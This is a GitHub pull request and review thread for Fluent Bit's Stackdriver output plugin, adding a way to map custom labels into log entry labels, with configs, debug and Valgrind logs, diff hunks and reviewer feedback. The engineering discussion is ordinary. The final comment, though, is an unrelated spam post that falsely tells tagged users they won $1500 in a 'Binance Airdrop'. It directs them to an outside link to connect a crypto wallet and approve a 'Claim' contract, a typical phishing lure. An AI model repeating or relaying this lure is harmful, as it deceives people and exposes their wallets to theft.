### PR TITLE
out_stackdriver: provide interface for ingesting customize labels

### PR DESCRIPTION
**Pull request by JeffLuoo**
Signed-off-by: Jeff Luo <jeffluoo@google.com>

In the FluentD output plugin, it supports the extractions to convert the custom labels to the logEntry (see here). Currently there is no parsing function in out_stackdriver plugin to convert the cunstom labels to the logEntry (root-level) labels. Therefore this feature request will request the feature to perform this mapping. For example, we can provide a naming convention in out_stackdriver that all labels under prefix ‘logging.googleapis.com/labels’ in one log message are extracted and set as labels under the log entry.

This patch will support fluent bit out_stackdriver to perform ingesting customize labels.

#2282 
----
Enter `[N/A]` in the box, if an item is not applicable to your change.

**Testing**
Before we can approve your change; please submit the following in a comment:
- [x] Example configuration file for the change
- [x] Debug log output from testing the change

- [x] Attached [Valgrind](https://valgrind.org/docs/manual/quick-start.html) output that shows no leaks or memory corruption was found

**Documentation**

- [x] Documentation required for this feature

----

Fluent Bit is licensed under Apache 2.0, by submitting this pull request I understand that this code will be released under the terms of that license.

### CODE REVIEW

**Comment by JeffLuoo** [comment]
## Example configuration file for the change
fluent-bit.conf
```yaml
[SERVICE]
    Flush        1
    Daemon       Off
    Log_Level    debug
    Parsers_File myparser.conf

[INPUT]
    Name          tail
    Tag              k8s_container.test
    Parser         JSON
    Path            /home/jeffluoo/fluentbit/testContainer.json

[OUTPUT]
    Name stackdriver
    Match k8s_container.*
    Resource global

[FILTER]
    Name nest
    Match *
    Operation lift
    Nested_under kubernetes

[FILTER]
    Name nest
    Match *
    Operation lift
    Nested_under labels
    Add_prefix k8s-pod/

[FILTER]
    Name nest
    Match *
    Operation nest
    Wildcard k8s-pod/*
    Nested_under logging.googleapis.com/labels
```
myparser.conf
```yaml
[PARSER]
   Name  JSON
   Format  json
```
testContainer.json
```json
{"stream":"stderr","time":"2019-03-09T13:52:36.806411254Z","log":"test Log Message","kubernetes":{"labels":{"controller-revision-hash":"foorbarr","pod-template-generation":"1","app":"logging-availability-test"},"namespace_name":"test-components","docker_id":"testDockerId","container_name":"logging-test","pod_name":"logging-availability-test-v8gwl","annotations":{"prometheus.io\/path":"\/","prometheus.io\/scrape":"true"},"host":"gke-test-host","pod_id":"test-pod-id"}}
```

**Comment by JeffLuoo** [comment]
##  Debug log output from testing the change
```
Fluent Bit v1.5.0
* Copyright (C) 2019-2020 The Fluent Bit Authors
* Copyright (C) 2015-2018 Treasure Data
* Fluent Bit is a CNCF sub-project under the umbrella of Fluentd
* https://fluentbit.io

[2020/06/23 15:27:33] [ info] Configuration:
[2020/06/23 15:27:33] [ info]  flush time     | 1.000000 seconds
[2020/06/23 15:27:33] [ info]  grace          | 5 seconds
[2020/06/23 15:27:33] [ info]  daemon         | 0
[2020/06/23 15:27:33] [ info] ___________
[2020/06/23 15:27:33] [ info]  inputs:
[2020/06/23 15:27:33] [ info]      tail
[2020/06/23 15:27:33] [ info] ___________
[2020/06/23 15:27:33] [ info]  filters:
[2020/06/23 15:27:33] [ info]      nest.0
[2020/06/23 15:27:33] [ info]      nest.1
[2020/06/23 15:27:33] [ info]      nest.2
[2020/06/23 15:27:33] [ info] ___________
[2020/06/23 15:27:33] [ info]  outputs:
[2020/06/23 15:27:33] [ info]      stackdriver.0
[2020/06/23 15:27:33] [ info] ___________
[2020/06/23 15:27:33] [ info]  collectors:
[2020/06/23 15:27:33] [debug] [storage] [cio stream] new stream registered: tail.0
[2020/06/23 15:27:33] [ info] [storage] version=1.0.4, initializing...
[2020/06/23 15:27:33] [ info] [storage] in-memory
[2020/06/23 15:27:33] [ info] [storage] normal synchronization mode, checksum disabled, max_chunks_up=128
[2020/06/23 15:27:33] [ info] [engine] started (pid=4936)
[2020/06/23 15:27:33] [debug] [engine] coroutine stack size: 24576 bytes (24.0K)
[2020/06/23 15:27:33] [debug] [input:tail:tail.0] inotify watch fd=19
[2020/06/23 15:27:33] [debug] [input:tail:tail.0] scanning path /home/jeffluoo/fluentbit/testContainer.json
[2020/06/23 15:27:33] [debug] [input:tail:tail.0] inode=1759475 appended as /home/jeffluoo/fluentbit/testContainer.json
[2020/06/23 15:27:33] [debug] [input:tail:tail.0] scan_glob add(): /home/jeffluoo/fluentbit/testContainer.json, inode 1759475
[2020/06/23 15:27:34] [ info] [oauth2] HTTP Status=200
[2020/06/23 15:27:34] [ info] [oauth2] access token from 'www.googleapis.com:443' retrieved
[2020/06/23 15:27:34] [debug] [router] match rule tail.0:stackdriver.0
[2020/06/23 15:27:34] [ info] [sp] stream processor started
[2020/06/23 15:27:34] [debug] [filter:nest:nest.0] Lift : Outer map size is 4, will be 11, lifting 1 record(s)
[2020/06/23 15:27:34] [debug] [filter:nest:nest.1] Lift : Outer map size is 11, will be 13, lifting 1 record(s)
[2020/06/23 15:27:34] [debug] [filter:nest:nest.2] outer map size is 13, will be 11, nested map size will be 3
[2020/06/23 15:27:34] [debug] [input:tail:tail.0] inode=1759475 file=/home/jeffluoo/fluentbit/testContainer.json promote to TAIL_EVENT
[2020/06/23 15:27:34] [ info] inotify_fs_add(): inode=1759475 watch_fd=1 name=/home/jeffluoo/fluentbit/testContainer.json
[2020/06/23 15:27:34] [debug] [task] created task=0x58bc64f5ce80 id=0 OK
[2020/06/23 15:27:34] [debug] [output:stackdriver:stackdriver.0] labels_key [timee] not found in the payload
[2020/06/23 15:27:34] [debug] [output:stackdriver:stackdriver.0] HTTP Status=200
[2020/06/23 15:27:34] [debug] [upstream] KA connection #30 to logging.googleapis.com:443 is now available
[2020/06/23 15:27:34] [debug] [task] destroy task=0x58bc64f5ce80 (task_id=0)
^C[engine] caught signal (SIGINT)
[2020/06/23 15:27:44] [ info] [input] pausing tail.0
[2020/06/23 15:27:44] [debug] [input:tail:tail.0] inode=1759475 removing file name /home/jeffluoo/fluentbit/testContainer.json
[2020/06/23 15:27:44] [ info] inotify_fs_remove(): inode=1759475 watch_fd=1
```

**Comment by JeffLuoo** [comment]
##  Attached Valgrind output that shows no leaks or memory corruption was found
```
==4938== Memcheck, a memory error detector
==4938== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==4938== Using Valgrind-3.14.0 and LibVEX; rerun with -h for copyright info
==4938== Command: ./bin/fluent-bit -c ../conf/testLabels.conf
==4938== 
Fluent Bit v1.5.0
* Copyright (C) 2019-2020 The Fluent Bit Authors
* Copyright (C) 2015-2018 Treasure Data
* Fluent Bit is a CNCF sub-project under the umbrella of Fluentd
* https://fluentbit.io

[2020/06/23 15:29:34] [ info] Configuration:
[2020/06/23 15:29:34] [ info]  flush time     | 1.000000 seconds
[2020/06/23 15:29:34] [ info]  grace          | 5 seconds
[2020/06/23 15:29:34] [ info]  daemon         | 0
[2020/06/23 15:29:34] [ info] ___________
[2020/06/23 15:29:34] [ info]  inputs:
[2020/06/23 15:29:34] [ info]      tail
[2020/06/23 15:29:34] [ info] ___________
[2020/06/23 15:29:34] [ info]  filters:
[2020/06/23 15:29:34] [ info]      nest.0
[2020/06/23 15:29:34] [ info]      nest.1
[2020/06/23 15:29:34] [ info]      nest.2
[2020/06/23 15:29:34] [ info] ___________
[2020/06/23 15:29:34] [ info]  outputs:
[2020/06/23 15:29:34] [ info]      stackdriver.0
[2020/06/23 15:29:34] [ info] ___________
[2020/06/23 15:29:34] [ info]  collectors:
[2020/06/23 15:29:34] [debug] [storage] [cio stream] new stream registered: tail.0
[2020/06/23 15:29:34] [ info] [storage] version=1.0.4, initializing...
[2020/06/23 15:29:34] [ info] [storage] in-memory
[2020/06/23 15:29:34] [ info] [storage] normal synchronization mode, checksum disabled, max_chunks_up=128
[2020/06/23 15:29:34] [ info] [engine] started (pid=4938)
[2020/06/23 15:29:34] [debug] [engine] coroutine stack size: 24576 bytes (24.0K)
[2020/06/23 15:29:34] [debug] [input:tail:tail.0] inotify watch fd=19
[2020/06/23 15:29:34] [debug] [input:tail:tail.0] scanning path /home/jeffluoo/fluentbit/testContainer.json
[2020/06/23 15:29:34] [debug] [input:tail:tail.0] inode=1759475 appended as /home/jeffluoo/fluentbit/testContainer.json
[2020/06/23 15:29:34] [debug] [input:tail:tail.0] scan_glob add(): /home/jeffluoo/fluentbit/testContainer.json, inode 1759475
[2020/06/23 15:29:36] [ info] [oauth2] HTTP Status=200
[2020/06/23 15:29:36] [ info] [oauth2] access token from 'www.googleapis.com:443' retrieved
[2020/06/23 15:29:36] [debug] [router] match rule tail.0:stackdriver.0
[2020/06/23 15:29:36] [ info] [sp] stream processor started
[2020/06/23 15:29:37] [debug] [filter:nest:nest.0] Lift : Outer map size is 4, will be 11, lifting 1 record(s)
[2020/06/23 15:29:37] [debug] [filter:nest:nest.1] Lift : Outer map size is 11, will be 13, lifting 1 record(s)
[2020/06/23 15:29:37] [debug] [filter:nest:nest.2] outer map size is 13, will be 11, nested map size will be 3
[2020/06/23 15:29:37] [debug] [input:tail:tail.0] inode=1759475 file=/home/jeffluoo/fluentbit/testContainer.json promote to TAIL_EVENT
[2020/06/23 15:29:37] [ info] inotify_fs_add(): inode=1759475 watch_fd=1 name=/home/jeffluoo/fluentbit/testContainer.json
==4938== Warning: client switching stacks?  SP change: 0x1ffefffd18 --> 0x616eab0
==4938==          to suppress, use: --max-stackframe=137320010344 or greater
==4938== Warning: client switching stacks?  SP change: 0x616ea28 --> 0x1ffefffd18
==4938==          to suppress, use: --max-stackframe=137320010480 or greater
==4938== Warning: client switching stacks?  SP change: 0x1ffefffd18 --> 0x616ea28
==4938==          to suppress, use: --max-stackframe=137320010480 or greater
==4938==          further instances of this message will not be shown.
[2020/06/23 15:29:37] [debug] [task] created task=0x6168680 id=0 OK
[2020/06/23 15:29:38] [debug] [output:stackdriver:stackdriver.0] labels_key [timee] not found in the payload
[2020/06/23 15:29:38] [debug] [output:stackdriver:stackdriver.0] HTTP Status=200
[2020/06/23 15:29:38] [debug] [upstream] KA connection #30 to logging.googleapis.com:443 is now available
[2020/06/23 15:29:38] [debug] [task] destroy task=0x6168680 (task_id=0)
^C[engine] caught signal (SIGINT)
[2020/06/23 15:29:46] [ info] [input] pausing tail.0
[2020/06/23 15:29:46] [debug] [input:tail:tail.0] inode=1759475 removing file name /home/jeffluoo/fluentbit/testContainer.json
==4938== 
==4938== HEAP SUMMARY:
==4938==     in use at exit: 0 bytes in 0 blocks
==4938==   total heap usage: 82,478 allocs, 82,478 frees, 10,478,919 bytes allocated
==4938== 
==4938== All heap blocks were freed -- no leaks are possible
==4938== 
==4938== For counts of detected and suppressed errors, rerun with: -v
==4938== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)
```

File: plugins/out_stackdriver/stackdriver.c [hunk 1]
```diff
@@ -277,6 +277,119 @@ static char *get_google_token(struct flb_stackdriver *ctx)
     return ctx->o->access_token;
 }
 
+/*
+* parse_labels
+* - Iterate throught the original payload (obj) and find out the entry that matches the labels_key
```
Comment (rsgowman) [inline plugins/out_stackdriver/stackdriver.c]: nit: CONTRIBUTING.md wants 80 characters lines; this one looks longer. (Double check throughout)

File: plugins/out_stackdriver/stackdriver.c [hunk 2]
```diff
@@ -277,6 +277,119 @@ static char *get_google_token(struct flb_stackdriver *ctx)
     return ctx->o->access_token;
 }
 
+/*
+* parse_labels
```
Comment (rsgowman) [inline plugins/out_stackdriver/stackdriver.c]: supernit: You probably want a space before the asterisks on lines 281 through 284.

File: plugins/out_stackdriver/stackdriver.c [hunk 3]
```diff
@@ -543,31 +659,51 @@ static int stackdriver_format(struct flb_config *config,
         /* Get timestamp */
         flb_time_pop_from_msgpack(&tms, &result, &obj);
 
+        num_pack = 3;
```
Comment (rsgowman) [inline plugins/out_stackdriver/stackdriver.c]: Personally, I like `map_size` better as a name. But feel free to keep this if you'd prefer; you've obviously got more context than I do. Optional.

File: plugins/out_stackdriver/stackdriver.c [hunk 4]
```diff
@@ -543,31 +659,51 @@ static int stackdriver_format(struct flb_config *config,
...
         /*
          * Pack entry
          *
          * {
+         *  "labels": "...",
```
Comment (rsgowman) [inline plugins/out_stackdriver/stackdriver.c:1133]: Technically, this should also have 'severity' in it too, right? Although it looks like both severity and labels are optional.

File: plugins/out_stackdriver/stackdriver.c [hunk 5]
```diff
@@ -543,31 +659,51 @@ static int stackdriver_format(struct flb_config *config,
...
          *  "logName": "...",
          *  "jsonPayload": {...},
          *  "timestamp": "..."
          * }
          */
+        labels_ptr = parse_labels(ctx, obj);
+        if (labels_ptr != NULL) {
+            num_pack += 1;
+        }
+
```
Comment (rsgowman) [inline plugins/out_stackdriver/stackdriver.c:1173]: You've now got two optional keys, so you're jumping around a bit. (labels are handled both before and after severity and in any case, it's unclear why creating the map should be in the severity block.) This is still readable, but could get worse if other optional parameters are added in the future. Consider refactoring into two stages: 1) Calculate the number of keys in the map. 2) Populate the map.

Concretely, that might look like:

```c
// Stage 1: Calculate the number of keys in the map

num_pack = 3;  // required keys: logName, jsonPayload, timestamp

labels_ptr = parse_labels(ctx, obj)
if (labels_ptr != NULL) {
    num_pack++;
}

has_severity = ctx->severity_key && get_severity_level(&severity, obj, ctx->severity_key) == 0
if (has_severity) {
    num_pack++;
}

// End stage 1

// Create the map
msgpack_pack_map(&mp_pck, num_pack);

// Stage 2: Populate the map

(as before)
```

You could optionally refactor each stage into a helper function.

**Comment by JeffLuoo** [comment]
Closed the PR for now for discussing the design and ideas.

File: plugins/out_stackdriver/stackdriver.c [hunk 6]
```diff
@@ -277,6 +277,119 @@ static char *get_google_token(struct flb_stackdriver *ctx)
     return ctx->o->access_token;
 }
 
+/*
+* parse_labels
+* - Iterate throught the original payload (obj) and find out the entry that matches the labels_key 
+* - Convert all labels under labels_key to root-level `labels` field
```
Comment (rsgowman) [inline plugins/out_stackdriver/stackdriver.c]: This function doesn't appear to do that. I'd remove this line entirely.
Alternatively, if you'd like to keep it, rephrase it to something like "Used to convert ..."

File: plugins/out_stackdriver/stackdriver.c [hunk 7]
```diff
@@ -277,6 +277,119 @@ static char *get_google_token(struct flb_stackdriver *ctx)
...
+    msgpack_object_kv *kv = NULL;
+
+    if (!obj || obj->type != MSGPACK_OBJECT_MAP) {
+        return NULL;
+    }
+
+    len = flb_sds_len(ctx->labels_key);
+    for (i = 0; i < obj->via.map.size; i++) {
+        kv = &obj->via.map.ptr[i];
+        if (kv->key.via.str.size == len &&
```
Comment (rsgowman) [inline plugins/out_stackdriver/stackdriver.c]: There appears to be a flb_sds_casecmp() function (flb_sds.h) which would accomplish this more directly. I suggest using that instead.

File: plugins/out_stackdriver/stackdriver.c [hunk 8]
```diff
@@ -277,6 +277,119 @@ static char *get_google_token(struct flb_stackdriver *ctx)
...
+    for (i = 0; i < map_size; i++) {
+        kv = &obj->via.map.ptr[i];
+        len = kv->key.via.str.size;
+        for (j = 0; j < len_to_be_removed; j++) {
+            removed = to_be_removed[j];
+            /* 
+             * check length of key to avoid partial matching
+             * e.g. labels key = labels && kv->key = labelss
+             */
+            if (flb_sds_len(removed) == len &&
```
Comment (rsgowman) [inline plugins/out_stackdriver/stackdriver.c]: flb_sds_casecmp().

(At which point, you can also get rid of the comment)

File: plugins/out_stackdriver/stackdriver.c [hunk 9]
```diff
@@ -277,6 +277,119 @@ static char *get_google_token(struct flb_stackdriver *ctx)
...
+
+    /* pack the original obj */ 
+    if (new_map_size == map_size) {
+        msgpack_pack_object(&mp_pck, *obj);
+        return 0;
+    }
+
+    msgpack_pack_map(&mp_pck, new_map_size);
+
+    for (i = 0; i < map_size; ++i) {
```
Comment (rsgowman) [inline plugins/out_stackdriver/stackdriver.c]: This block is almost entirely identical to the block starting on line 342, though I'm not sure if we can improve it much. Still, it would be worth taking a look at filter_modifier.c, which does something almost identical to this. They seem to use a bool_map to track each entry and whether it should be included/excluded which makes the subsequent iteration to create the resulting map a bit more direct.

Another approach would be to move this to a helper function which takes an additional function pointer (action_when_key_not_found) which would be a simple counter in the first case, and some msg_pack functions in the second. This might be a little overkill though.

Feel free to leave as is; no action required.

File: plugins/out_stackdriver/stackdriver.c [hunk 10]
```diff
@@ -277,6 +277,119 @@ static char *get_google_token(struct flb_stackdriver *ctx)
...
+        key_not_found = 1;
+        kv = &obj->via.map.ptr[i];
+        len = kv->key.via.str.size;
+        key_size = kv->key.via.str.size;
+        for (j = 0; j < len_to_be_removed; j++) {
+            removed = to_be_removed[j];
+            if (flb_sds_len(removed) == len &&
```
Comment (rsgowman) [inline plugins/out_stackdriver/stackdriver.c]: flb_sds_casecmp().

File: plugins/out_stackdriver/stackdriver.c [hunk 11]
```diff
@@ -543,31 +659,51 @@ static int stackdriver_format(struct flb_config *config,
...
          * {
+         *  "labels": "...",
          *  "logName": "...",
          *  "jsonPayload": {...},
          *  "timestamp": "..."
          * }
          */
+        labels_ptr = parse_labels(ctx, obj);
+        if (labels_ptr != NULL) {
+            num_pack += 1;
```
Comment (rsgowman) [inline plugins/out_stackdriver/stackdriver.c]: Perfectly fine, though ++ would be more traditional. Optional.

File: plugins/out_stackdriver/stackdriver.c [hunk 12]
```diff
@@ -277,6 +277,119 @@ static char *get_google_token(struct flb_stackdriver *ctx)
...
+        }
+    }
+
+    flb_plg_debug(ctx->ins, "labels_key [%s] not found in the payload", 
+                  ctx->labels_key);
+    return NULL;
+}
+
+/* using packer mp_pck to pack obj except some special elements */
+static int pack_object_except(msgpack_object *obj, msgpack_packer mp_pck,
```
Comment (rsgowman) [inline plugins/out_stackdriver/stackdriver.c]: Most (all?) of the msgpack functions have the packer first, followed by the things that are being added to it. I'd recommend following the same pattern here, i.e.: `static int pack_object_except(msgpack_packer, msgpack_object, ctx)`

File: plugins/out_stackdriver/stackdriver_conf.c [hunk 13]
```diff
@@ -306,6 +313,7 @@ int flb_stackdriver_conf_destroy(struct flb_stackdriver *ctx)
     flb_sds_destroy(ctx->token_uri);
     flb_sds_destroy(ctx->resource);
     flb_sds_destroy(ctx->severity_key);
+    flb_sds_destroy(ctx->labels_key);
```
Comment (rsgowman) [inline plugins/out_stackdriver/stackdriver_conf.c:363]: Should there be some tests for this PR?

**Comment by JeffLuoo** [comment]
Hi @rsgowman Thanks for taking time to review my PR. I also created a same PR at upstream https://github.com/fluent/fluent-bit/pull/2297. I made some cosmetic change over here but not for the main logic I am using. I will review your comments after finishing my current task and thanks again for your review !!

File: plugins/out_stackdriver/stackdriver.c (hunk 2 above)
Comment (JeffLuoo) [reply plugins/out_stackdriver/stackdriver.c]: updated

File: plugins/out_stackdriver/stackdriver.c (hunk 1 above)
Comment (JeffLuoo) [reply plugins/out_stackdriver/stackdriver.c]: updated

File: plugins/out_stackdriver/stackdriver.c (hunk 6 above)
Comment (JeffLuoo) [reply plugins/out_stackdriver/stackdriver.c]: updated

File: plugins/out_stackdriver/stackdriver.c (hunk 7 above)
Comment (JeffLuoo) [reply plugins/out_stackdriver/stackdriver.c]: updated

File: plugins/out_stackdriver/stackdriver.c (hunk 12 above)
Comment (JeffLuoo) [reply plugins/out_stackdriver/stackdriver.c]: this function has been replaced by https://github.com/fluent/fluent-bit/blob/master/plugins/out_stackdriver/stackdriver.c#L699

File: plugins/out_stackdriver/stackdriver.c (hunk 8 above)
Comment (JeffLuoo) [reply plugins/out_stackdriver/stackdriver.c]: see comment above.

File: plugins/out_stackdriver/stackdriver.c (hunk 10 above)
Comment (JeffLuoo) [reply plugins/out_stackdriver/stackdriver.c]: see comment above.

File: plugins/out_stackdriver/stackdriver.c (hunk 11 above)
Comment (JeffLuoo) [reply plugins/out_stackdriver/stackdriver.c]: thanks.

File: plugins/out_stackdriver/stackdriver.c (hunk 9 above)
Comment (JeffLuoo) [reply plugins/out_stackdriver/stackdriver.c]: thanks

File: plugins/out_stackdriver/stackdriver.c (hunk 3 above)
Comment (JeffLuoo) [reply plugins/out_stackdriver/stackdriver.c]: It has been renamed to https://github.com/fluent/fluent-bit/blob/master/plugins/out_stackdriver/stackdriver.c#L812 on the upstream master

File: plugins/out_stackdriver/stackdriver.c (hunk 4 above)
Comment (JeffLuoo) [reply plugins/out_stackdriver/stackdriver.c:1133]: updated

File: plugins/out_stackdriver/stackdriver.c (hunk 5 above)
Comment (JeffLuoo) [reply plugins/out_stackdriver/stackdriver.c:1173]: updated

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[Claim Now](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @jvrcavalcanti, @andrewtian, @zihejia, @fritzfde, @mtsewrs, @yaoligang, @4Dguy, @dkindt, @dylanmat, @poodarchu, @Daniel-bxy, @zetanove, @Jodekko, @batikanor, @saanny, @karamelle, @she-is-subbyte, @jugaldb, @ch3yne, @patrykcyrzan, @snxii, @sdzyba, @ascjones, @mrbannyo, @LTAcosta, @ZhaoYis, @sepplK, @dariajung, @riccardogabellone, @JeheeChoi, @fritzblue, @devsli, @PvdBerg1998, @XU-YaoKun, @craigatron, @Artur-Sulej, @LucienBrule, @davekerr95, @Lunaphied, @studentutu, @lzhpo, @wegitit, @tjbtiller, @suncle1993, @ccddr, @tejasag, @aceshigh1309, @patema, @chillfetti, @mw999
